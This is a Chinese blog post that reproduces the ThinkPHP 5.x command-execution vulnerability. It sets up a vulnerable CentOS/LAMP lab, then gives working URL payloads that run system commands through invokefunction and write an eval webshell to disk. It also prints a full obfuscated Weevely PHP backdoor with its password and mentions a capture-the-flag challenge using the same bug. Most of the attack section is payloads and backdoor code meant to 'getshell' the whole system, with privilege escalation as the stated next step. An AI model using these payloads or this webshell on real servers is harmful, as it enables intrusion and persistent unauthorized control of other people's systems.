thinkphp5.x命令执⾏漏洞复现及环境搭建楼主Linux环境是Centos7,LAMP怎么搭不⽤我废话吧,别看错了
1.安装composer
yum -y install composer
安装php拓展
yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -y
2.切换⽬录到/var/www/html
cd /var/www/html
安装thinkphp5
博主把含有命令执⾏漏洞的thinkphp源码链接附上
把⽂件解压到当前⽬录(/var/www/html)即可
3.浏览器查看是否安装成功
到这⾥环境就搭建好了(各位看官如果照着前⾯的步骤没有成功的,⿇烦把php运⾏环境搭建起来)php项目搭建
4.参考官⽅poc直接执⾏payload
#payload
192.168.2.134/tp5/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
可以看到,这⾥权限是Apache
这⾥说下,头⼀天强⽹杯web有⼀题就是thinkphp5.x的命令执⾏漏洞,叫做强⽹先锋上单。。。
当时觉得还好,随便拉的⼏个队友,有⼈做出来了,我去重新做了⼀遍(关键是互相不认识,谁做的根本不知道)
⼀开始扫描⽬录,没发现什么,后⾯留意到有⽇志,都是命令执⾏错误的信息,猜到可能是命令执⾏,⼀看cms是thinkphp5于是就百度翻payload去了,⼀打,flag有了,flag就藏在根⽬录下⾯,hhhhh
⾔归正传,下⾯尝试写⼩马,getshell整个系统
payload附上
192.168.2.134/tp5/public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20 ^%3C? php%20@eval($_GET[%22dd%22])?^%3E%3Eceshi.php
强⽹的时候是可以正常写⼊的,但是⽆法解析php,可能设置了权限
本地测试的时候发现,根本⽆法写⼊⼩马,如图,估计要先看看源码,问题
后⾯看了下⽇志,注意到报错,应该是语句被过滤了,⼩马不够强壮
后⾯我⽤weevely重新⽣成了⼀个⼩马,重新载⼊,连上了
webshell附上
<?php
$v='$cK^&&$i<$lK^);$j+K^+,$i++K^K^){$o.=$t{$K^i}^K^$k{$j};}}K^retK^urn $o;}if (@pK^K^reg_match("K^/$kK^h(.';
$S=str_replace('jW','','crjWjWeatejW_fjWjWunctijWon');
$t='K^zuncoK^mpress(@K^xK^(@bK^ase64_decodeK^($m[1K^]),$k)));K^ K^ $oK^=@ob_get_conteK^ntK^s(); @oK^bK^_';
$X='end_clean(K^); $K^r=@base6K^4_encoK^de(@x(K^K^K^@gzcomK^press($o),$k));K^ priK^nt("$p$khK^$r$kf");}';
$o='+K^)$kf/K^",@fK^ile_get_conteK^ntsK^("php://inK^put")K^K^,$m) == 1) { K^ @ob_sK^taK^rt(); @eK^val(@g';
$f='$k="098K^K^f6bcd";$khK^=K^"4621d373cade";$kK^f="4K^e832627bK^4f6"K^K^;$p="sK^015KnbG8K^frqxRiQ";fK^K^u';
$w='nctiK^on x($t,$kK^){K^$c=strlen($k)K^;$K^l=K^strlen($t);$o="K^"K^;K^for($i=0;$i<$l;)K^{for($jK^=K^0;($j<';
$N=str_replace('K^','',$f.$w.$v.$o.$t.$X);
$d=$S('',$N);$d();
>
>##
密码test
>##
下⼀步,想办法提权操作,毕竟权限太低了weevely⽀持很多的操作,如下图
有空继续整,未完待续
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论